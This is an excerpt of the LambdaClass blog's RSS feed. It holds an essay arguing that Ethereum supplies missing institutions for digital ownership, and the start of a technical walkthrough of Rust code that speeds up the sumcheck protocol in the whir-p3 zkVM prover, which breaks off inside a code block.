          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-missing-institution-of-the-internet-ethereum/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-missing-institution-of-the-internet-ethereum/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-missing-institution-of-the-internet-ethereum/">&lt;p&gt;Modern economic systems rest on two foundations: tools that expand productive capacity and institutions that define who controls their output. The internet transformed how information moves, but it did not reconstruct the institutional machinery that governs ownership and exchange. Digital economic life therefore expanded without a durable system of rights, enforcement, or jurisdiction. Blockchain networks, and Ethereum in particular, address this gap by embedding institutional functions in software and enforcing them through economic incentives and cryptographic verification.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;technology-culture-and-institutional-design&quot;&gt;Technology, Culture and Institutional Design&lt;&#x2F;h2&gt;
&lt;p&gt;In most species, behavior is shaped by biology and fixed through genetic inheritance. Humans diverged by inventing technologies that alter their environment more rapidly than biological evolution can adapt to it. Fire, agriculture, medicine and computing enabled a physically vulnerable species to extend its productive frontiers.&lt;&#x2F;p&gt;
&lt;p&gt;Equally significant was the emergence of institutions that facilitated cooperation beyond small groups. Human societies are organized not through inherited instinct but through constructed systems of norms, laws and symbolic abstractions that can be revised in response to changing conditions. Cultural evolution permits continuous redesign and operates on a faster timescale than genetic change.&lt;&#x2F;p&gt;
&lt;p&gt;This dual process, technological augmentation and institutional invention, generated compounding effects. Tools expanded individual capacity and institutions aggregated that capacity into collective action. Property rights, contracts, markets and corporate entities emerged as mechanisms to coordinate behavior at scale by defining entitlements and aligning incentives.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;property-rights-and-markets-as-social-technologies&quot;&gt;Property Rights and Markets as Social Technologies&lt;&#x2F;h2&gt;
&lt;p&gt;Economic development depends not only on productive capability but on credible commitments. Individuals and firms invest when they can expect to benefit from their efforts and be protected from arbitrary interference. Property rights provide that assurance by specifying ownership, use and exclusion. Markets, layered on top of these rights, coordinate production and exchange by allocating resources through price signals.&lt;&#x2F;p&gt;
&lt;p&gt;These arrangements are often treated as natural features of economic life. They are engineered agreements constructed through law and political settlement. Their value lies in enabling investment, specialization and trade under uncertainty. Prices, money and contracts compress information about scarcity, preferences and risk, enabling production to be coordinated across large populations without centralized direction.&lt;&#x2F;p&gt;
&lt;p&gt;The global expansion of trade in the twentieth century reflected these institutional foundations. Specialization increased productivity and interdependence reduced conflict by raising the cost of disruption. Innovations such as neutral jurisdictions and corporate structures enabled strangers to transact under shared rules. Legal entities functioned as containers that allowed participants from different regulatory environments to collaborate.&lt;&#x2F;p&gt;
&lt;p&gt;This infrastructure, whether admired or criticized, underwrote the international economic order of the late twentieth century.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-missing-architecture-of-digital-ownership&quot;&gt;The Missing Architecture of Digital Ownership&lt;&#x2F;h2&gt;
&lt;p&gt;The internet lowered the cost of communication and commerce across borders, but it did not establish a neutral mechanism for defining and enforcing claims on digital assets. Offline, ownership is adjudicated by courts, enforced by states and geographically bounded. Online, in the absence of a global authority, ownership defaults to either national legal systems or to the platforms that mediate activity.&lt;&#x2F;p&gt;
&lt;p&gt;Corporations filled this vacuum by providing infrastructure for identity, communication and exchange. They set terms of access, mediate transactions and retain discretionary control over assets generated within their systems. Users and firms may create content, build businesses and accumulate value, but their rights are contingent on the policies of the platform operator.&lt;&#x2F;p&gt;
&lt;p&gt;The experience of Zynga illustrates this dynamic. The company developed a profitable games business on Facebook and briefly achieved a valuation exceeding that of Electronic Arts. Its fortunes deteriorated when Facebook revised its policies and altered its revenue share. Zynga owned its intellectual property and its infrastructure but not the environment on which its business model depended, a common position for firms built on platform economies. In digital markets, platforms function as de facto landlords.&lt;&#x2F;p&gt;
&lt;p&gt;This is not an isolated case but a structural feature of platform centered economies: extensive participation paired with limited control.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;ethereum-as-an-institutional-experiment&quot;&gt;Ethereum as an Institutional Experiment&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum is a response to this institutional absence. It provides a mechanism for creating, transferring and enforcing digital assets without reliance on corporate or national intermediaries. The system operates as a verifiable computing environment in which rules are encoded in software and enforced collectively by a distributed network.&lt;&#x2F;p&gt;
&lt;p&gt;Traditional computing systems require users to trust the operator. Ethereum distributes computation across thousands of machines that execute identical code and verify each other in a continuous process. Outputs are accepted when consensus is reached and misbehavior is economically penalized. Under these conditions, property rights and contractual commitments can be represented as digital objects whose enforcement does not depend on courts or discretionary authority.&lt;&#x2F;p&gt;
&lt;p&gt;This architecture automates functions normally performed by institutions. Auditors review financial records to detect manipulation. Courts resolve disputes. Regulators impose compliance standards. These systems are essential but costly and slow. Ethereum replicates aspects of verification and enforcement at the system level using software, mathematics and economic incentives.&lt;&#x2F;p&gt;
&lt;p&gt;The network is open to participation without authorization and resistant to censorship because no single entity can unilaterally block or rewrite transactions. These properties arise from the structure of the system rather than ideological intent.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-emergence-of-a-digital-financial-system&quot;&gt;The Emergence of a Digital Financial System&lt;&#x2F;h2&gt;
&lt;p&gt;The first adopters of Ethereum were technologists experimenting with new mechanisms for ownership and coordination. Most of the culture and early products were created by these adopters for themselves. Over time, a broader range of actors began using the system for financial services.&lt;&#x2F;p&gt;
&lt;p&gt;The most consequential development has been the rise of stablecoins, digital representations of fiat currency backed by real world assets. Their combined market capitalization exceeds three hundred billion dollars, with a majority circulating on Ethereum. Transaction volumes on blockchain networks now approach those processed by major payment systems.&lt;&#x2F;p&gt;
&lt;p&gt;Stablecoins replicate core financial functions such as store of value and transfer of funds without geographic restrictions and with continuous settlement. Their programmability enabled the construction of lending protocols that allow users to lend and borrow assets with risk parameters enforced in software rather than through institutional mediation.&lt;&#x2F;p&gt;
&lt;p&gt;These systems differ from traditional financial infrastructure. Participation is global rather than jurisdictional. Switching costs are low because services are built on interoperable standards. Exit is immediate. Risk is transparent though often misunderstood.&lt;&#x2F;p&gt;
&lt;p&gt;Compare that to countries like Argentina, where interoperability between banks and fintech wallets, something as trivial as scanning a QR code, is still an ongoing regulatory battle. Incumbents try to use their market position to avoid being interoperable. On Ethereum, interoperability is structural. Individuals can receive payment, convert assets, provide liquidity and borrow collateralized funds within minutes from a mobile device. In legacy systems, similar transactions take days and incur high fees. Adoption reflects demand for neutral infrastructure in environments where intermediation is unreliable.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;implications&quot;&gt;Implications&lt;&#x2F;h2&gt;
&lt;p&gt;Several areas of financial activity are migrating to blockchain based systems, including remittances, trade finance and private credit. Others, such as corporate debt markets, remain fragmented and costly but exhibit characteristics that may make them suitable for digital reconstruction on top of Ethereum.&lt;&#x2F;p&gt;
&lt;p&gt;Significant obstacles remain. Regulatory uncertainty, operational risk and user experience challenges constrain adoption. Scaling transaction throughput without compromising decentralization is an engineering problem that has not been solved conclusively. Software vulnerabilities and governance failures present meaningful risk.&lt;&#x2F;p&gt;
&lt;p&gt;These challenges appear tractable. Early evidence suggests that elements of financial intermediation can be automated at lower cost and with greater transparency than existing systems. The trajectory of adoption will depend on institutional responses as much as technical progress.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;artificial-intelligence-and-coordination&quot;&gt;Artificial Intelligence and Coordination&lt;&#x2F;h2&gt;
&lt;p&gt;Artificial intelligence increases productive capacity by automating tasks but does not resolve questions of ownership, governance or compliance. Output may be generated more efficiently, but disputes over entitlement, liability and compensation persist.&lt;&#x2F;p&gt;
&lt;p&gt;Artificial intelligence and blockchains, Ethereum in particular, are two of the biggest innovations of the decades to come. The two technologies address core human primitives: productivity gains and coordination. Artificial intelligence will make people more productive, but it will not eliminate the bureaucratic machinery required to verify and enforce outcomes. Ethereum introduces a technology that complements AI: a system where humans and autonomous agents can coordinate, trade, and settle disputes directly through code, without relying on institutions to prove that everyone followed the rules.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;The internet lowered the cost of transmitting information but did not create institutions for defining and enforcing rights over digital assets. The result has been an economy coordinated by private platforms rather than neutral systems of governance. Ethereum reconstructs elements of property rights and contractual enforcement as public infrastructure encoded in software.&lt;&#x2F;p&gt;
&lt;p&gt;Whether such systems become core infrastructure or remain specialized instruments will depend on institutional adaptation, regulation and technological progress. They have already demonstrated an alternative cost structure for financial coordination and introduced mechanisms for digital property that do not rely on centralized administration.&lt;&#x2F;p&gt;
&lt;p&gt;The internet built an economy without institutions. Ethereum is an attempt to build them.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Speeding up sumcheck for Ethereum&#x27;s Lean zkVM: an in-depth walkthrough of our implementation</title>
          <pubDate>Fri, 28 Nov 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/speeding-up-sumcheck-an-in-depth-walkthrough-of-our-implementation/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/speeding-up-sumcheck-an-in-depth-walkthrough-of-our-implementation/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/speeding-up-sumcheck-an-in-depth-walkthrough-of-our-implementation/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we’ll present an in-depth walkthrough of our implementation of the sumcheck optimizations proposed by Bagad, Dao, Domb, and Thaler (BDDT) in their &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;1117&quot;&gt;paper&lt;&#x2F;a&gt;. In previous posts, we’ve explained the main theoretical ideas (see &lt;a href=&quot;&#x2F;optimizing-sumcheck&#x2F;&quot;&gt;part I&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;how-factoring-equality-polynomials-optimizes-sumcheck&#x2F;&quot;&gt;part II&lt;&#x2F;a&gt;). Here, we dive deep into the implementation details, showing exactly how we implemented &lt;em&gt;Algorithm 6&lt;&#x2F;em&gt; from that paper within the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tcoratger&#x2F;whir-p3&quot;&gt;whir-p3&lt;&#x2F;a&gt; repository.&lt;&#x2F;p&gt;
&lt;p&gt;This work was motivated by the Lean Ethereum team, which uses Whirlaway, a multilinear protocol that relies on Whir as its Polynomial Commitment Scheme (PCS). The team identified that the sumcheck protocol could benefit from existing optimizations (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tcoratger&#x2F;whir-p3&#x2F;issues&#x2F;280&quot;&gt;see issue #280&lt;&#x2F;a&gt;). To address this, we stepped in to implement the BDDT optimizations in their codebase.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;&#x2F;strong&gt; The code snippets presented in this post correspond to the implementation merged in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tcoratger&#x2F;whir-p3&#x2F;pull&#x2F;322&quot;&gt;PR&lt;&#x2F;a&gt;. While the whir-p3 repository is under active and constant development, we have chosen to analyze this specific snapshot because it offers the highest didactic clarity. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&#x2F;tree&#x2F;eec71d03a5ec81f30acc6d591f42f318941c6df5&quot;&gt;This version&lt;&#x2F;a&gt; — which you can find in our repository fork — maintains a faithful one-to-one mapping with the theoretical concepts of the BDDT paper, making it the ideal reference for understanding the core logic before further engineering optimizations are applied.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;i-the-core-idea-delaying-expensive-field-arithmetic&quot;&gt;I. The Core Idea: Delaying Expensive Field Arithmetic&lt;&#x2F;h2&gt;
&lt;p&gt;The naive sumcheck prover forces expensive extension field arithmetic too early. The goal of the BDDT optimizations is simple: &lt;strong&gt;delay the introduction of extension field operations as long as possible&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;extension-field-computation&quot;&gt;Extension Field Computation&lt;&#x2F;h3&gt;
&lt;p&gt;In systems like Jolt (which motivated the paper) or Whir, the underlying computation (e.g., an execution trace) operates over small base field values—32-bit or 64-bit integers. However, cryptographic security requires the sumcheck protocol to use extension field random challenges. In our implementation, we work with base fields like &lt;em&gt;Baby Bear&lt;&#x2F;em&gt; (31-bit), &lt;em&gt;Koala Bear&lt;&#x2F;em&gt;, or &lt;em&gt;Goldilocks&lt;&#x2F;em&gt; (64-bit), along with their extensions (e.g., &lt;code&gt;BinomialExtensionField&amp;lt;BabyBear, 4&amp;gt;&lt;&#x2F;code&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;The performance gap between these operations is dramatic. The BDDT paper introduces a precise cost model:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;𝔰𝔰 (small-small)&lt;&#x2F;strong&gt;: multiplying two base field elements, e.g., &lt;code&gt;BabyBear * BabyBear&lt;&#x2F;code&gt;. This is the fastest: just a single base field multiplication.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;𝔰𝔩 (small-large)&lt;&#x2F;strong&gt;: multiplying a base field element by an extension field element, e.g., &lt;code&gt;BabyBear * BinomialExtensionField&amp;lt;BabyBear, 4&amp;gt;&lt;&#x2F;code&gt;, requires 4 base field multiplications (one per extension coefficient).&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;𝔩𝔩 (large-large)&lt;&#x2F;strong&gt;: multiplying two extension field elements, e.g., &lt;code&gt;BinomialExtensionField&amp;lt;BabyBear, 4&amp;gt; * BinomialExtensionField&amp;lt;BabyBear, 4&amp;gt;&lt;&#x2F;code&gt;, is dramatically slower, requiring 16 base field multiplications plus additional operations, often an order of magnitude slower than 𝔰𝔰.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;the-cost-problem&quot;&gt;The Cost Problem&lt;&#x2F;h3&gt;
&lt;p&gt;The naive (or classical) sumcheck prover (&lt;em&gt;Algorithm 1&lt;&#x2F;em&gt; in the paper) suffers from premature extension field propagation:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Round 1&lt;&#x2F;strong&gt;: the prover computes sums of products of base field values—all cheap 𝔰𝔰 operations.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Round 2 onward&lt;&#x2F;strong&gt;: the verifier sends a random challenge $r_1 \in \mathbb{F}_{\text{ext}}$, an extension field element. This forces all subsequent computations to use extension field arithmetic. From this point on, the prover must perform expensive 𝔩𝔩 operations for all remaining rounds.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;The key insight:&lt;&#x2F;strong&gt; Delay this transition as long as possible. It is better to perform more operations, but in the base field. That’s the whole idea.&lt;&#x2F;p&gt;
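&lt;p&gt;The cost gap can be made concrete with a toy sketch (this is not the Plonky3 field code: the prime is BabyBear’s, but the binomial constant and layout are illustrative). A 𝔰𝔩 product costs 4 base multiplications, while a schoolbook 𝔩𝔩 product costs 16 plus the reduction:&lt;&#x2F;p&gt;

```rust
const P: u64 = 2_013_265_921; // the BabyBear prime, 15 * 2^27 + 1
const W: u64 = 11; // illustrative binomial constant for F_p[X]/(X^4 - W)

fn mul(a: u64, b: u64) -> u64 { a * b % P }
fn add(a: u64, b: u64) -> u64 { (a + b) % P }

/// 𝔰𝔩: base * extension costs 4 base multiplications (one per coefficient).
fn mul_small_large(s: u64, a: [u64; 4]) -> [u64; 4] {
    [mul(s, a[0]), mul(s, a[1]), mul(s, a[2]), mul(s, a[3])]
}

/// 𝔩𝔩: schoolbook product modulo X^4 - W costs 16 base multiplications,
/// plus extra ones to fold each X^{4+i} term back to W * X^i.
fn mul_large_large(a: [u64; 4], b: [u64; 4]) -> [u64; 4] {
    let mut c = [0u64; 8];
    for i in 0..4 {
        for j in 0..4 {
            c[i + j] = add(c[i + j], mul(a[i], b[j]));
        }
    }
    let mut r = [0u64; 4];
    for i in 0..4 {
        r[i] = add(c[i], mul(W, c[i + 4]));
    }
    r
}

fn main() {
    let a = [1, 2, 3, 4];
    // Embedding a base element as (9, 0, 0, 0) shows both paths agree,
    // but the 𝔩𝔩 route burns 4x the base multiplications of the 𝔰𝔩 route.
    assert_eq!(mul_large_large([9, 0, 0, 0], a), mul_small_large(9, a));
}
```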
&lt;h2 id=&quot;ii-the-two-optimizations-svo-and-eq-poly&quot;&gt;II. The Two Optimizations: SVO and Eq-Poly&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;em&gt;Algorithm 6&lt;&#x2F;em&gt; synthesizes two complementary optimizations. Understanding each in isolation clarifies how they work together.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;a-small-value-optimization-svo&quot;&gt;A. Small Value Optimization (SVO)&lt;&#x2F;h3&gt;
&lt;p&gt;The Small Value Optimization (&lt;em&gt;Algorithm 4&lt;&#x2F;em&gt;) is a computational strategy: &lt;strong&gt;to delay extension field operations&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;A naive approach (&lt;em&gt;Algorithm 3&lt;&#x2F;em&gt;) would expand the polynomial into $\mathcal{O}( 2^{ d \cdot \ell_0})$ terms to keep base field and extension field components separated. This is exponentially expensive and infeasible for practical values.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The SVO insight:&lt;&#x2F;strong&gt; Use &lt;strong&gt;Lagrange Interpolation&lt;&#x2F;strong&gt; instead of expansion. This is the same principle behind Toom-Cook multiplication. By treating the round polynomial as something to be interpolated (from a small number of evaluation points) rather than expanded (into exponentially many monomials), we reduce precomputation cost from $\mathcal{O} (2^{ d \cdot \ell_0})$ to $\mathcal{O}(( d + 1)^{ \ell_0})$.&lt;&#x2F;p&gt;
&lt;p&gt;You can see &lt;a href=&quot;&#x2F;optimizing-sumcheck&#x2F;&quot;&gt;part I&lt;&#x2F;a&gt; of our series for the intuition behind this optimization.&lt;&#x2F;p&gt;
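&lt;p&gt;A minimal sketch of the evaluate-then-interpolate idea: multiplying two linear polynomials from their evaluations at $0$, $1$, and $\infty$—the same evaluation points the prover uses for its degree-2 round polynomials—using 3 multiplications instead of the 4 of monomial expansion (toy prime field, not the whir-p3 code):&lt;&#x2F;p&gt;

```rust
const P: u64 = 2_013_265_921; // BabyBear prime (illustrative choice)

fn mul(a: u64, b: u64) -> u64 { a * b % P }
fn sub(a: u64, b: u64) -> u64 { (P + a - b) % P }

/// Multiply a0 + a1*X and b0 + b1*X by evaluating the product at
/// {0, 1, infinity} and interpolating, instead of expanding into
/// monomials: 3 multiplications instead of 4 (the Toom-2 trick).
fn toom2(a: [u64; 2], b: [u64; 2]) -> [u64; 3] {
    let at0 = mul(a[0], b[0]); // q(0)
    let at1 = mul((a[0] + a[1]) % P, (b[0] + b[1]) % P); // q(1)
    let at_inf = mul(a[1], b[1]); // q(infinity): the leading coefficient
    // Interpolate c0 + c1*X + c2*X^2 from the three evaluations.
    [at0, sub(sub(at1, at0), at_inf), at_inf]
}

fn main() {
    // (2 + 3X)(5 + 7X) = 10 + 29X + 21X^2
    assert_eq!(toom2([2, 3], [5, 7]), [10, 29, 21]);
}
```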
&lt;h3 id=&quot;b-eq-poly-optimization-algorithm-5&quot;&gt;B. Eq-Poly Optimization (Algorithm 5)&lt;&#x2F;h3&gt;
&lt;p&gt;The second optimization (&lt;em&gt;Algorithm 5&lt;&#x2F;em&gt;) addresses the specific case&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
g(X) = \mathrm{eq}(w, X)p(X).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;It is based on Gruen’s optimization, and the idea is to reduce 𝔩𝔩 multiplications associated with the $\mathrm{eq}$ polynomial.&lt;&#x2F;p&gt;
&lt;p&gt;Instead of summing over all remaining variables at once, the algorithm “splits the sum” into two halves.&lt;&#x2F;p&gt;
&lt;p&gt;See &lt;a href=&quot;&#x2F;how-factoring-equality-polynomials-optimizes-sumcheck&#x2F;&quot;&gt;part II&lt;&#x2F;a&gt; of our series for the full explanation.&lt;&#x2F;p&gt;
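&lt;p&gt;The split can be sketched over a toy field (illustrative field and sizes, not the whir-p3 API): the full table of $\mathrm{eq}(w, x)$ over $\{0,1\}^\ell$ factors into two half-tables of size $2^{\ell&#x2F;2}$, which is what makes splitting the sum cheap:&lt;&#x2F;p&gt;

```rust
const P: u64 = 97; // small illustrative prime field

fn mul(a: u64, b: u64) -> u64 { a * b % P }

/// Table of eq(w, x) = prod_i (w_i*x_i + (1 - w_i)(1 - x_i)) for all
/// x in {0,1}^l, with the first variable as the most significant bit.
fn eq_table(w: &[u64]) -> Vec<u64> {
    let mut t = vec![1u64];
    for &wi in w {
        let mut next = Vec::with_capacity(t.len() * 2);
        for &v in &t {
            next.push(mul(v, (1 + P - wi) % P)); // branch x_i = 0
            next.push(mul(v, wi)); // branch x_i = 1
        }
        t = next;
    }
    t
}

fn main() {
    let w = [3u64, 5, 7, 11];
    let (w_left, w_right) = w.split_at(2);
    // Two tables of size 2^{l/2} instead of one of size 2^l:
    let (left, right) = (eq_table(w_left), eq_table(w_right));
    let full = eq_table(&w);
    for (i, l) in left.iter().enumerate() {
        for (j, r) in right.iter().enumerate() {
            // eq(w, (x_L, x_R)) = eq(w_L, x_L) * eq(w_R, x_R)
            assert_eq!(full[i * right.len() + j], mul(*l, *r));
        }
    }
}
```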
&lt;h2 id=&quot;iii-the-protocol-architecture-two-phase-strategy&quot;&gt;III. The Protocol Architecture: Two-Phase Strategy&lt;&#x2F;h2&gt;
&lt;p&gt;Our implementation is essentially encapsulated within the function &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&#x2F;blob&#x2F;eec71d03a5ec81f30acc6d591f42f318941c6df5&#x2F;src&#x2F;sumcheck&#x2F;sumcheck_single_svo.rs#L22&quot;&gt;&lt;code&gt;from_base_evals_svo&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;, which is called by the prover to execute the sumcheck protocol following &lt;em&gt;Algorithm 6&lt;&#x2F;em&gt;. It combines both SVO and Eq-Poly optimization. In our implementation, we chose:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$\ell_0 = 3$: we do just three SVO rounds, since this optimization is efficient only for a few rounds, as we’ll explain in detail later on.&lt;&#x2F;li&gt;
&lt;li&gt;$d = 1$: we accept only one multilinear polynomial, instead of a product of polynomials as shown in the BDDT paper. This choice is due to the fact that in the use case that interests us (that is, in the context of Whir) we only have one polynomial.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Given the base field evaluations of the multilinear polynomial $p$ on the hypercube (&lt;code&gt;evals&lt;&#x2F;code&gt;) and an eq-poly constraint (&lt;code&gt;constraint&lt;&#x2F;code&gt;), it applies a certain number of sumcheck rounds (&lt;code&gt;folding_factor&lt;&#x2F;code&gt;), returning a new &lt;code&gt;SumcheckSingle&lt;&#x2F;code&gt; and the challenges used.&lt;&#x2F;p&gt;
&lt;p&gt;It is important to point out that this implementation is designed for a &lt;code&gt;folding_factor&lt;&#x2F;code&gt; greater than 5 and a &lt;code&gt;constraint&lt;&#x2F;code&gt; containing only &lt;strong&gt;one equality statement&lt;&#x2F;strong&gt;, since we want to use Whir as a PCS.&lt;&#x2F;p&gt;
&lt;p&gt;So, the goal of this function is to prove an equality constraint&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\sigma = p(w),&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where we can rewrite the evaluation as a sum:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
p(w) = \sum_{x \in \{0, 1\}^\ell} \mathrm{eq}(w, x) p(x).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
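&lt;p&gt;This identity can be checked numerically with a toy sketch (illustrative prime field; the helper names are ours, not whir-p3’s): folding the hypercube evaluations one variable at a time gives the same value as the eq-weighted sum over the hypercube:&lt;&#x2F;p&gt;

```rust
const P: u64 = 2_013_265_921; // BabyBear prime (illustrative choice)

fn mul(a: u64, b: u64) -> u64 { a * b % P }
fn add(a: u64, b: u64) -> u64 { (a + b) % P }

/// Fold out the first variable: evals'[x'] = (1 - r)*evals[0, x'] + r*evals[1, x'].
fn fold(evals: &[u64], r: u64) -> Vec<u64> {
    let half = evals.len() / 2;
    (0..half)
        .map(|i| add(mul((1 + P - r) % P, evals[i]), mul(r, evals[half + i])))
        .collect()
}

/// Evaluate the multilinear extension at w by folding one variable at a time.
fn eval_at(evals: &[u64], w: &[u64]) -> u64 {
    let mut e = evals.to_vec();
    for &wi in w {
        e = fold(&e, wi);
    }
    e[0]
}

/// eq(w, x) for a single hypercube point x (first variable = top bit).
fn eq(w: &[u64], x: usize, ell: usize) -> u64 {
    let mut acc = 1u64;
    for (i, &wi) in w.iter().enumerate() {
        let xi = (x >> (ell - 1 - i)) & 1;
        acc = mul(acc, if xi == 1 { wi } else { (1 + P - wi) % P });
    }
    acc
}

fn main() {
    let evals: Vec<u64> = (0..8).map(|i| (i * i + 1) as u64).collect();
    let w = [3u64, 5, 7];
    // p(w) = sum over x in {0,1}^3 of eq(w, x) * p(x)
    let weighted = (0..8usize).fold(0u64, |s, x| add(s, mul(eq(&w, x, 3), evals[x])));
    assert_eq!(eval_at(&evals, &w), weighted);
}
```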
&lt;p&gt;The core insight of this algorithm: &lt;strong&gt;use different strategies for different phases&lt;&#x2F;strong&gt;. Here’s the high-level structure:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Run a Sumcheck prover following Algorithm 6.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn from_base_evals_svo&amp;lt;Challenger&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    evals: &amp;amp;EvaluationsList&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prover_state: &amp;amp;mut ProverState&amp;lt;F, EF, Challenger&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    folding_factor: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pow_bits: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    constraint: &amp;amp;Constraint&amp;lt;F, EF&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; (Self, MultilinearPoint&amp;lt;EF&amp;gt;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut challenges = Vec::with_capacity(folding_factor);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Here we are assuming the equality statement has only one constraint.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut sum = constraint.eq_statement.evaluations[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let w = &amp;amp;constraint.eq_statement.points[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Create the unified equality polynomial evaluator&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut eq_poly = SumcheckEqState::&amp;lt;_, NUM_SVO_ROUNDS&amp;gt;::new(w);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; --- PHASE 1: SVO for first 3 rounds ---&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (r_1, r_2, r_3) = svo_three_rounds(prover_state, evals, w, &amp;amp;mut sum, pow_bits);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    challenges.extend([r_1, r_2, r_3]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
